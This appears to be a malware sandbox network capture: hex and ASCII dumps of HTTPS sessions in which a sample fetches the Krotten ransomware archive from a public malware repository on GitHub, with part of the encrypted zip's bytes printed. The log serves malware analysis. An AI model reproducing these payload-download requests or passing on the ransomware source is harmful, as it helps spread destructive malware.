                                                                                                                                                            2022-09-29 12:44:49 UTC1144INData Raw: d1 05 3a 8c 59 a6 b0 c3 09 8a 36 7e 25 46 14 07 53 76 e2 44 ef 79 47 7c 0b da 8f bb 07 67 47 f2 e7 66 32 a3 c4 e8 10 1a 7a da e6 80 9c dd 44 f4 35 63 d7 64 a0 43 69 c9 e0 91 21 b5 96 ab 95 e0 da d8 a8 a5 a3 75 fa 72 5b 97 6c 1c 23 48 d2 a9 25 5a e2 84 e3 5c 13 81 f2 4e 19 d7 91 c0 58 ba a6 31 ba 4f b7 1e 72 ab b0 ff d7 91 be 24 dc 27 a5 e1 00 4d bd 59 97 8f f6 85 c0 0b 02 61 79 0e 23 a3 73 10 fd 22 92 a8 f6 f5 3d d1 7c e7 8c a5 a4 f4 b7 76 18 ec 64 84 e4 85 61 01 3f 7c e6 4b c5 5b e7 dc 96 1a 76 db 32 0d 7a 1b de 0d 2d a9 c9 ba d0 1a 5a 35 db 4e f0 06 56 3a ca d4 a5 58 0e 66 71 4c de 86 d8 2a 1c d5 a4 99 6c 0c 03 03 f6 b8 44 11 02 46 c5 95 6f fd 64 f7 b4 32 3c 4e f5 b5 a3 d2 4b 7e 6a a6 93 ab 2d d6 8e 4f 14 81 d5 29 2c da 79 ac 30 7a 4e 19 6d c4 9d 9c de
                                                                                                                                                            Data Ascii: :Y6~%FSvDyG|gGf2zD5cdCi!ur[l#H%Z\NX1Or$'MYay#s"=|vda?|K[v2z-Z5NV:XfqL*lDFod2<NK~j-O),y0zNm
                                                                                                                                                            2022-09-29 12:44:49 UTC1145INData Raw: 9d e9 26 66 0b c0 be a2 8a f2 b5 49 97 8b 71 fe 8c 57 af 97 c6 37 17 62 a2 47 11 ba c7 55 ef ba 63 b6 74 06 4f 4d 35 99 81 02 8a 76 18 a0 32 4a 64 53 d3 bf 05 55 ca 03 ac fc 77 e4 4f 90 d3 e0 c5 c1 75 e5 33 6f 92 85 38 36 00 fd ea 92 e9 d9 da 56 e0 6d 2e ec c6 ed 92 62 f1 45 40 ef 69 14 2c 83 49 05 bc f0 45 5c 70 2d 2a e2 38 82 3e 86 c3 d7 62 25 f6 46 f5 6e 71 4c 47 25 ec 0b 80 d5 96 c2 7d 0f 2d c7 00 55 c1 d7 56 de cd 35 4b b5 9b 06 87 4b 03 85 d2 13 f5 46 8f da 9e 76 88 a4 29 40 97 b0 15 99 b5 22 d4 a1 af ee 8b d5 78 96 e1 10 a8 18 1e e4 8f 2c d5 85 13 57 f1 e6 d2 a8 29 63 56 03 ea 12 23 4e e1 18 15 77 ba 2c 36 5f 67 d5 6f 58 7d 86 23 b4 22 32 0e 05 ee 2e c5 37 ef 5c c0 12 d5 9b d0 a9 d1 64 61 69 ad 91 37 73 fa 16 37 b1 60 4b 84 e5 ef 64 25 a6 ab 8b fb
                                                                                                                                                            Data Ascii: &fIqW7bGUctOM5v2JdSUwOu3o86Vm.bE@i,IE\p-*8>b%FnqLG%}-UV5KKFv)@"x,W)cV#Nw,6_goX}#"2.7\dai7s7`Kd%
                                                                                                                                                            2022-09-29 12:44:49 UTC1146INData Raw: b7 59 6a c0 79 dc 53 40 76 b2 72 ae bc 89 15 cd 23 2c 1e 0d 7f aa 04 e6 fb 87 d0 50 72 0c 4b 41 ab c0 ba 75 54 dd d8 77 0a 60 7c b3 8b 45 a5 14 03 9e 92 e5 a4 97 a2 cc 83 d0 f8 e8 49 25 64 1b 0e 54 e0 48 9b 4e 02 f1 51 37 be 63 03 a3 96 e3 59 5d 35 a9 7e d8 96 e2 d2 22 d3 49 02 62 20 2c af 4f 2f dc 12 ba ec ae 0a d4 a4 5a 39 62 bc 0a 0b 0c 78 f4 3d 3a 96 d1 cd 1d da fe 87 6f f3 d5 cc 5f fd a8 c5 cf ea e6 02 c6 4b 92 83 b7 d3 28 27 6f cf 20 b8 8b 16 55 88 a8 ed da e0 c7 49 ef 13 df 90 0a eb 22 2a 57 a0 05 21 02 85 00 5a c6 ee 23 51 88 b0 41 b1 0d e8 7a 5d e7 98 20 eb 8a e5 2a 09 55 c0 7c 28 f6 59 d8 fc 3d fe d1 8a 52 99 5d 19 ae 08 ba df ee c4 8a 9d 8f e0 6d 75 ed 0b 3c 63 a3 f3 de ae 2a 81 1d 39 f7 5b 50 44 73 f6 d9 08 61 80 03 af 89 a6 01 cc f2 ae 55 f6
                                                                                                                                                            Data Ascii: YjyS@vr#,PrKAuTw`|EI%dTHNQ7cY]5~"Ib ,O/Z9bx=:o_K('o UI"*W!Z#QAz] *U|(Y=R]mu<c*9[PDsaU
                                                                                                                                                            2022-09-29 12:44:49 UTC1148INData Raw: 59 68 ed 48 0b 4b 60 bb d2 44 31 04 9a 18 60 1e 68 b7 97 2a 8c 3f 6c b4 11 c6 3c 2c 4c 70 f1 40 ee 0b a5 b0 03 07 e5 09 49 a9 3d 28 3c 73 d4 67 17 cd b3 97 4b 8d c5 c0 be e1 a6 79 12 12 df 9e 8f 9e b5 fa e4 68 68 41 20 e3 c4 f5 a8 4d ec 28 93 3c 10 78 48 be 06 01 00 3c 14 af eb 98 8e 24 79 a5 7d 04 4e 2f f5 4e ff a4 b7 6b 64 78 86 9e 66 8e b6 86 58 fd 3c 50 61 70 9a e0 02 78 96 63 98 5d fc c4 23 53 fd 80 4b 2d 7a a0 73 4a 75 e1 b1 4b f3 cd b0 f7 11 8d 33 0d b6 6a 30 d7 26 fd 5c fb a7 e2 cc 34 ea 91 de c8 3f a0 76 ec d7 32 83 0a 95 2d 53 01 e4 8d c9 2c 43 8f 0f 00 0a 80 90 fc 32 4f f6 77 53 dd 44 96 3a 6f f5 01 66 12 1c 3b a7 eb b7 3c e5 3e eb 4b 8f 91 4a ca dc 35 0e 21 af e2 df 2e 39 3e f6 f0 3f ec 43 c0 7d e9 06 bb 66 fe 5e 8f 9c c1 a9 41 d6 31 ff cb 2a
                                                                                                                                                            Data Ascii: YhHK`D1`h*?l<,Lp@I=(<sgKyhhA M(<xH<$y}N/NkdxfX<Papxc]#SK-zsJuK3j0&\4?v2-S,C2OwSD:of;<>KJ5!.9>?C}f^A1*
                                                                                                                                                            2022-09-29 12:44:49 UTC1149INData Raw: 60 6a d3 38 e0 a9 a6 98 c6 d4 8f c5 71 2d 02 b2 f1 d3 8f 27 61 5d 43 6e a0 79 00 f8 09 58 78 93 a2 c1 8d 3c 38 fd 65 92 00 4d 1b c2 59 b0 a2 7a c2 5e 5d a7 99 17 ea 2c d9 c4 d2 fd ed 33 5a 14 a2 4e 45 2b 7c 97 c7 fc e7 6c c9 c8 59 b5 8f dd f2 c5 30 f8 35 1f 6e f5 08 c1 7a fd c4 29 3f b9 3a 43 fa ef c0 d7 39 0c 5f fa 22 61 cb 49 f1 06 a9 fc 40 47 46 13 62 5a 55 79 43 e2 80 db 9a c6 d0 cc 66 5c 23 bb 21 b4 44 9f 11 43 80 8a 90 9d c5 55 0b a8 d2 eb 35 20 e8 72 dc ac 16 5e 6b f4 53 0a 89 49 7c 18 86 58 73 52 06 5d e5 2f bd 0f 90 29 9c b5 19 cf 1b 1e 03 ec 8d 13 ea cb c2 4d 87 dd 18 22 06 52 de 7e a9 24 96 71 67 54 ee a6 35 05 bc 8a 01 cd 35 a0 a1 c9 fb e1 e6 c1 61 ea cb ac 99 a5 1a 61 0b 2f 93 ec 0e 2e b1 f6 5a 25 7f 16 ec ce 65 20 97 37 c0 fc 98 16 40 16 5e
                                                                                                                                                            Data Ascii: `j8q-'a]CnyXx<8eMYz^],3ZNE+|lY05nz)?:C9_"aI@GFbZUyCf\#!DCU5 r^kSI|XsR]/)M"R~$qgT55aa/.Z%e 7@^
                                                                                                                                                            2022-09-29 12:44:49 UTC1150INData Raw: e7 90 e3 3c ac 3b 94 69 03 8f 11 d4 e1 bc 85 c2 be dd 36 41 cc 1b ba 0c 59 86 0f 33 96 9b 38 6b 74 68 42 5c e3 55 81 20 bc c9 e9 35 be 3f 1e 8c b6 82 d1 c4 42 48 d7 45 d2 65 e9 a3 35 15 20 94 67 87 1d 7e 12 74 d4 4d 32 b3 eb 69 a1 46 71 59 22 33 b2 54 0e 18 d9 2c f1 e8 95 a4 8c 64 ba 66 db 2c 07 ad f4 70 6c 09 c5 d4 b9 63 a0 d5 35 fb 81 93 da cc d1 e3 ad 7c d5 8d 35 44 66 78 d0 fa de 95 98 c7 c9 91 2a c1 f1 fb 35 63 65 3b 4d a7 30 ec 40 c5 ad e1 23 8a 79 66 2f 52 b1 28 b7 76 73 f2 ab 3b 4a e0 f4 60 60 fb ad 50 28 6c b1 51 ee cd 69 5b f7 29 ae 4f 35 01 70 4d 35 8f 2d a1 df 57 cc f6 5d b9 3c 40 e1 f5 4a 47 1b 95 4f 60 43 1c 70 a0 7e e1 ab 04 3a a2 01 93 41 ec f2 e6 6b 02 82 22 97 91 8d a4 df 67 48 ee 77 00 e2 c2 ec aa 9c 8b d1 28 07 6a 70 c9 75 18 d0 d6 72
                                                                                                                                                            Data Ascii: <;i6AY38kthB\U 5?BHEe5 g~tM2iFqY"3T,df,plc5|5Dfx*5ce;M0@#yf/R(vs;J``P(lQi[)O5pM5-W]<@JGO`Cp~:Ak"gHw(jpur


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            26192.168.2.649721140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:49 UTC1152OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            27140.82.121.4443192.168.2.649721C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:49 UTC1152INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:09 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:44:49 UTC1152INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            28192.168.2.649722185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:49 UTC1154OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            29185.199.110.133443192.168.2.649722C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:49 UTC1154INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 26359
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "b4c9a9caad9a8cc039faac50748e91b4ea099c21f7a0b4b606256ae51df449bc"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 080E:67C0:101BE30:11154D1:6335932F
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:49 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6977-MXP
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1664455489.257823,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: dad912eb2501e0d39fc81131c9d2dd9dbff17949
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:49:49 GMT
                                                                                                                                                            Source-Age: 18
                                                                                                                                                            2022-09-29 12:44:49 UTC1155INData Raw: 50 4b 03 04 33 00 01 00 63 00 cf a3 e4 38 00 00 00 00 2f 66 00 00 29 d5 00 00 16 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 4b 72 6f 74 74 65 6e 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 51 1f 85 1c 8b 3e 2c 09 fa d6 8a ea d4 7d 01 2f 41 8d 8b 07 f0 fd bb 72 93 3d 0e ed 40 4e 7a 13 95 d4 dd 52 47 43 5a fe 98 0e 0e 17 7b 8d 0b 48 2a e1 a6 38 9c 0d 69 c0 a2 4e b7 13 22 57 2e 2b 04 a2 0e 40 b8 3b 45 f0 af 7f 66 fa c6 fd 85 22 c0 6c 99 74 ef 66 9e f4 72 6a d9 dc 4d 40 bf 11 c6 56 7f 5a ef ee 2f ee 69 5e 5a 83 44 c1 e1 ac 9e 0d 4a 58 19 bc d5 4a ed 6d 0f 35 24 46 b4 51 93 93 a8 4a d0 a7 d9 78 fe 72 46 e5 ea dd ae 9f d1 96 48 23 2c 3a 7f d8 74 27 ef d1 37 1b d5 be bd 4a 4b 51 4a c2 83 3d a5 d6 81 75 5c f0 dc 4d 2c f1 64 1c 28 3c 89 b5 e7 cd 2c 29 bf 64 4a f0
                                                                                                                                                            Data Ascii: PK3c8/f)Endermanch@Krotten.exeAEQ>,}/Ar=@NzRGCZ{H*8iN"W.+@;Ef"ltfrjM@VZ/i^ZDJXJm5$FQJxrFH#,:t'7JKQJ=u\M,d(<,)dJ
                                                                                                                                                            2022-09-29 12:44:49 UTC1156INData Raw: 7e 07 d3 91 36 cc 6c 5d e7 86 c4 bb 68 42 cb 46 fd 3d 53 ef 9a 53 c0 07 a2 a2 fb 2d 2a 97 b1 11 17 27 a3 e2 cd e6 8b 85 1d b8 5e 1d 76 5f f8 48 bb 13 ea 13 88 ed e9 39 9b e4 4f 1d 5b 57 77 14 89 a3 33 0d cd 2d 1c a3 b3 8f 4a fb 61 14 c1 c0 39 92 61 fb ba ad 73 31 0e 78 fb 55 f8 ea e5 36 47 f5 37 b6 48 f6 3b 4f 2f 13 bc 87 5e bb f9 a8 84 93 8b 7f aa e9 ba c2 df 48 f0 a1 09 4c f2 2b c0 26 c3 ec ad 2b 27 48 54 35 3e e4 a1 2f 4a f1 e5 3e 63 45 93 59 ee c1 17 10 cf b7 0a 01 bb 2f 3e 40 e2 96 e7 96 1a 65 42 0d b5 43 d2 26 07 82 cd df 4d 59 00 b3 27 c4 5b 05 2d ba 78 12 48 47 84 96 1e 22 12 c6 b7 9a da 78 5f 2a 58 63 aa ab 3e 4c 26 88 77 b3 73 e9 78 ad 2e 31 a3 8d 09 c2 64 6e 25 01 35 42 06 f8 72 fb 72 b0 c2 ea 64 0b a0 18 d6 f5 0e 30 3d a2 29 67 9c d9 e2 58 45
                                                                                                                                                            Data Ascii: ~6l]hBF=SS-*'^v_H9O[Ww3-Ja9as1xU6G7H;O/^HL+&+'HT5>/J>cEY/>@eBC&MY'[-xHG"x_*Xc>L&wsx.1dn%5Brrd0=)gXE
                                                                                                                                                            2022-09-29 12:44:49 UTC1158INData Raw: ae 9b f4 c8 3e 7a 74 41 7b b8 2e ef b9 95 a5 e1 52 93 e0 18 af 7b b9 ea ba 7b 09 b8 17 56 3d a0 ca 02 f9 9b 23 a6 23 9e 8c 82 2a 51 2d ae fa eb 89 45 7d 46 5a 53 57 b8 c1 6d 3e 2f e7 2c 0f 04 0a 5b 12 53 71 4f 7d 32 3a 8f 94 81 58 12 b4 7e de 48 b5 d8 5e 26 a8 29 8c f2 e7 dd 9e 5c 9b 12 97 03 2f a5 aa ae a6 44 c9 8c 27 5e 3d 44 7f 98 c1 7d b7 eb 24 f4 de 5c bb b7 0e 9a 9b 9b 01 dd 79 93 79 ed 98 38 ee 61 5f aa fe bb 18 d8 3d 45 53 62 54 d1 13 69 5f 7e 2b 69 18 e8 13 16 e4 87 29 83 8f 25 c0 a9 31 16 a8 65 7f 4c 60 16 f1 7e f1 84 12 21 9c eb 16 48 d2 71 8e 2d 24 2e 5b 04 a5 15 05 54 ed 5a 03 e5 b6 e8 b5 fb ab b6 69 c6 44 53 36 d5 c4 68 3c 7c 15 85 3c ef 6d 35 c6 12 10 a5 a8 c2 57 32 ac eb 19 32 2a dd 65 ad ef ab 60 5c 7e a3 75 bb c1 75 12 5b 8a e6 78 62 14
                                                                                                                                                            Data Ascii: >ztA{.R{{V=##*Q-E}FZSWm>/,[SqO}2:X~H^&)\/D'^=D}$\yy8a_=ESbTi_~+i)%1eL`~!Hq-$.[TZiDS6h<|<m5W22*e`\~uu[xb
                                                                                                                                                            2022-09-29 12:44:49 UTC1159INData Raw: 63 53 b5 5a bd a6 44 ed d9 02 99 fd 6d 6d ab 31 2c 4d bc f8 f9 95 69 f6 43 4b 13 52 40 19 68 1c b0 8c e2 5a 3a f6 88 cc c7 c6 c8 71 72 db 85 65 79 a0 88 1c 80 52 78 5b 2d dd 51 d6 7f 1d 38 2d d3 5b 59 42 3b f4 13 9d 5c 5d 72 ae 9d eb 83 7c 49 15 9f a8 14 1b 11 da 86 cb a4 f9 88 40 ac dc 36 33 46 30 9a 6e a6 77 18 db 85 67 b2 59 0d a1 be 95 ac 10 10 a4 b7 18 9d e1 0a c5 f8 66 34 91 d0 be f5 c7 25 79 26 b6 65 28 29 29 99 e4 46 c4 88 3e ce 9c 57 ff 55 a8 80 fe 7f fd 7c 98 22 2b 0c 6f d1 cc 8f ec 1c 6c fc c5 e7 86 f8 30 94 c8 d2 bd 71 93 63 53 1c 20 5d 85 ed dc 9f 63 68 db 93 bc 04 40 b0 b5 3c 33 54 17 f8 ea 5c 74 6a 62 3b ab a2 30 36 df 5a 6b df 31 b7 c3 7e 60 ae e4 11 7c d3 d6 8b 46 b1 b7 39 f1 8e 30 4f 4f 1d fa 7a e1 0b 66 74 50 05 fe 6c a9 34 e8 2d 6a 5d
                                                                                                                                                            Data Ascii: cSZDmm1,MiCKR@hZ:qreyRx[-Q8-[YB;\]r|I@63F0nwgYf4%y&e())F>WU|"+ol0qcS ]ch@<3T\tjb;06Zk1~`|F90OOzftPl4-j]
                                                                                                                                                            2022-09-29 12:44:49 UTC1160INData Raw: f5 a8 e8 97 c4 0b fe 16 47 d3 16 f6 3a 4f 3b 1c d2 7e 95 8d 8e 11 45 2a 99 15 52 4a c4 71 73 a9 d6 e3 4e 2b a9 78 b3 c5 19 0f ea da 8c 7e e2 e1 75 2e cb e0 4a 03 90 4e 4a a3 9c be 32 22 b2 b8 14 8d fb 10 64 57 4e ae 9f ad 68 fc 78 f9 ca 1f b6 91 ca 2f 0f 5c a4 0c 9a cf 28 74 c9 b8 bb 29 06 db 9a 57 ae 02 18 e5 2b 4f 1c 67 68 f0 5c ee 75 50 2a ee 4a 88 f8 d1 d1 53 8d 23 83 b5 dd 06 61 05 0c 53 e3 a8 92 b2 87 61 f8 f7 c4 58 44 f9 ab 63 b8 2f 84 4d e1 96 55 0f 91 a9 93 5b 57 24 8b dc 32 55 7c 58 b9 04 7a 1a e7 e3 05 2a c1 4b 10 92 2b 70 49 49 5f 46 d1 49 8e c0 61 47 58 4a f1 10 2a 27 a2 e8 1c 68 f9 72 8d 98 93 a8 78 65 8e c1 d5 3f d1 95 f9 16 a0 50 ba a0 f1 dd 58 fd 1c 2a 0d 08 94 13 2f 00 2e 59 f8 17 f2 b3 d2 6c dd 48 6c 60 0e f7 69 40 4f a8 a3 6a a2 ea 2c
                                                                                                                                                            Data Ascii: G:O;~E*RJqsN+x~u.JNJ2"dWNhx/\(t)W+Ogh\uP*JS#aSaXDc/MU[W$2U|Xz*K+pII_FIaGXJ*'hrxe?PX*/.YlHl`i@Oj,
                                                                                                                                                            2022-09-29 12:44:49 UTC1162INData Raw: ba 77 e6 2f d6 40 2b 3a c1 10 19 77 c3 68 7f d4 d8 45 87 3c d6 57 f7 ec 4a d5 22 af 4e f8 57 c0 27 85 f5 df 71 1b b8 86 72 f0 d7 e8 69 db 35 76 2f ab ad 22 d7 be 42 85 02 6e 01 ac 30 c4 0b e7 a3 fa ef b1 e9 08 b9 a1 2d 2d 1b e7 18 57 f9 cc 25 5d 9b 96 81 bc 22 13 0a db 67 3d 05 e2 85 0b 4b 29 b6 7d 64 33 99 b2 71 e0 33 ba 56 7a ef 26 80 3c dd b1 b1 d3 cc d8 20 b7 3c 7e 97 e3 c1 ed a9 aa a0 fa d7 7f fc b0 2a 94 79 29 28 fa 3a a7 85 7d 7e f8 3d 2d ee 4e 1a 51 20 c6 22 75 56 77 ef e2 62 e0 05 7f 4c 66 b1 bf eb 6b 33 fe 39 e9 7e e3 eb 62 ce db 96 59 34 96 ac 7e 89 af 4c 57 a4 57 89 bb b0 cb 2a b8 35 e8 1f 37 68 b9 3a 91 80 aa be de f9 e4 67 8a a8 01 7a c4 81 7f cc 63 47 60 d5 20 10 bb ae c6 30 98 bc b1 e6 0e 64 60 62 63 a0 ee 94 f9 97 77 52 da dd 0c 2d 6a 6a
                                                                                                                                                            Data Ascii: w/@+:whE<WJ"NW'qri5v/"Bn0--W%]"g=K)}d3q3Vz&< <~*y)(:}~=-NQ "uVwbLfk39~bY4~LWW*57h:gzcG` 0d`bcwR-jj
                                                                                                                                                            2022-09-29 12:44:49 UTC1163INData Raw: e6 9c df 45 c9 81 e1 73 37 b0 b9 ee bf 4e 78 de ca cb 4c 4e cc e7 5d 75 ee 15 e9 94 8a 0d 0e 8a 83 83 7e 52 a2 17 35 f7 ff 3d 12 48 9e 38 cb 3c 1c d7 36 54 6a b4 c9 6c 2d c7 77 58 2b 60 ef 2d 09 43 26 d1 2f 6c b3 70 b3 d7 e5 7c 72 40 35 41 62 fd 85 d5 b8 5e ca 49 ff 22 eb cc 42 47 7d 91 08 5b 76 37 2a a7 c5 0d ff 9a a5 10 0c e6 6e e9 e5 b4 80 4c f5 32 cc b1 89 1c e8 72 fa b3 2a 7f 4c fc da 58 ae 76 51 6d a3 09 71 26 ff b2 a6 f4 bc 77 77 92 27 3d c2 64 9b 0d 0e be bc 21 54 6e 9c 7d 0c 93 3f 39 e9 0f 86 9c 08 87 6e b5 33 8a 1c d9 f7 44 1f 16 40 3e 22 fb a1 84 97 d5 c7 fb 11 c7 a7 07 9f ad b4 97 5c 4d bc 58 dc 0b 0c c8 a7 7c 1b d4 aa 61 56 78 81 78 94 e6 84 9d 1a 7a b8 2e fe 9f ab 08 a2 fe f6 2d 53 ee 45 34 40 b7 59 ee c8 f2 6a ae cc cb ad d7 28 70 08 01 77
                                                                                                                                                            Data Ascii: Es7NxLN]u~R5=H8<6Tjl-wX+`-C&/lp|r@5Ab^I"BG}[v7*nL2r*LXvQmq&ww'=d!Tn}?9n3D@>"\MX|aVxxz.-SE4@Yj(pw
                                                                                                                                                            2022-09-29 12:44:49 UTC1164INData Raw: 3b 7f 40 3b d1 ff 3b 95 d0 c1 af ab fa cb a9 83 a6 ac f8 7f b2 1e a2 b3 72 4e cc fa bb d1 99 3f 90 a2 b2 10 c6 44 3c 53 d0 2a 28 26 f7 e1 65 28 c2 18 9d 41 5e b8 81 6c ac c5 83 15 09 00 62 bf e8 b5 03 57 75 05 ac ed d3 db 48 4e 7a 1f d8 11 73 e7 8f 72 19 8c 50 7a 52 27 d2 af d8 64 fe 67 9b cc c2 9e f4 a8 bd 13 41 7e ab 73 ff ed e1 af b7 eb 1d a9 31 43 ee ad c4 bc ab 2d 49 27 ee 80 3d c4 b7 45 dc c8 bf 8f 4c dc 86 50 ee fd 5f 65 9e 77 09 b5 d2 3a 22 39 f9 7f 26 6a a2 52 a6 39 0f 78 e3 64 69 9c 5e 4d 2a e5 23 cd 88 ff 51 43 e7 4d c4 a7 81 c1 66 f8 6c a4 a2 0d be 5d 59 a9 d9 c4 8d 5c 45 0f 40 3f 72 f7 66 8d ef f4 56 61 8d 29 4b db 3c b8 25 01 d8 54 c4 89 80 f8 da 4d cc fb c2 31 4d fe 33 bd ae bf 2b ff 99 45 8e b3 2a be b8 9f b7 63 c1 c2 50 72 fb 58 e8 24 e3
                                                                                                                                                            Data Ascii: ;@;;rN?D<S*(&e(A^lbWuHNzsrPzR'dgA~s1C-I'=ELP_ew:"9&jR9xdi^M*#QCMfl]Y\E@?rfVa)K<%TM1M3+E*cPrX$
                                                                                                                                                            2022-09-29 12:44:49 UTC1166INData Raw: 28 9b 60 1e 71 b8 90 ee e6 49 14 f3 4c 4a 84 4d 24 40 91 9b 4a c8 8a 32 04 2c 23 f2 a5 55 2c 3a aa 65 3e 2d d2 4e f9 de 40 b9 c2 98 2e f2 35 b1 e7 f9 fb b1 12 b3 ca b8 75 3e ab 61 b9 8b 73 9b 1a e0 57 f4 39 39 ba 5f 35 80 61 23 90 86 0e c4 2e e8 12 7d 89 5b ac 2e 27 0e 1c 33 76 67 be 99 31 ce 75 23 0d 55 eb 67 aa 91 2f bd 76 13 97 92 61 58 52 20 42 05 c4 20 2b 18 ec 4a 9f ba 42 70 93 9e 72 9e 75 7b 42 09 0e 09 50 fc 92 5e 95 05 f2 b3 f3 ec 94 7a 2d ea c1 05 07 99 d2 7c c2 0f 06 96 5b 48 13 e9 92 f4 8b 89 b3 9a 7c 26 a5 27 06 78 2a f2 a9 b7 02 18 2a f9 af 29 b4 42 be bf d9 b4 1f da da 22 2f 0e 7c 10 b4 76 fd c5 74 94 ac 39 04 9e ff 9a f5 c7 b1 9c 5c 97 34 92 b7 75 07 72 ec 1a 1f 1e 82 b2 e3 30 96 47 ba 11 ce e0 07 01 6e bb be 65 f2 7f fd b5 c3 d5 23 ce 8d
                                                                                                                                                            Data Ascii: (`qILJM$@J2,#U,:e>-N@.5u>asW99_5a#.}[.'3vg1u#Ug/vaXR B +JBpru{BP^z-|[H|&'x**)B"/|vt9\4ur0Gne#
                                                                                                                                                            2022-09-29 12:44:49 UTC1167INData Raw: c7 11 83 83 4a d7 2f 05 22 24 93 49 ef 67 7e 71 b7 11 82 b1 65 d9 e8 5c b9 f1 a0 5c b0 d2 9d e8 f0 a0 a3 b6 47 b0 39 68 91 ca f0 09 55 d8 bc 30 8d d3 99 af b8 86 0b 29 c8 e1 7b 72 4f 12 a5 23 32 65 ac 6c 52 67 9f ee 69 11 f6 57 a0 fd 2e 11 5d 91 cb ce 0f ba 60 65 4d ca 8b 93 b3 9b a1 9c 73 0b 1a 59 aa 66 c8 3b 43 6d bf 99 c4 e3 2a 1d 23 bd e5 85 de 96 b9 59 ba 21 74 09 22 2f 61 7d 8a b8 ea 4d 9c ac 15 5d 2d a3 85 61 b9 87 f4 16 54 88 93 e7 4e 9b 79 fb 79 25 9b 51 7d 00 e9 15 90 4d 90 a8 0b b5 28 43 05 34 1a ad 6e 2c f3 e3 ad 4a 76 1e e7 ec f4 2f 4d 6d 77 dc e1 03 19 ef 7a 47 9b a0 2d f3 64 a0 b0 71 6e f4 dc 97 80 f8 48 90 0b 07 7f dd 86 97 d4 a3 fa d4 0c 10 ff 9f e9 f6 48 1a 47 d0 7b 51 6a 30 53 3f 6f 81 8a 9c 0e e8 67 56 16 e8 6b 4f c7 85 35 c0 f3 5b 9c
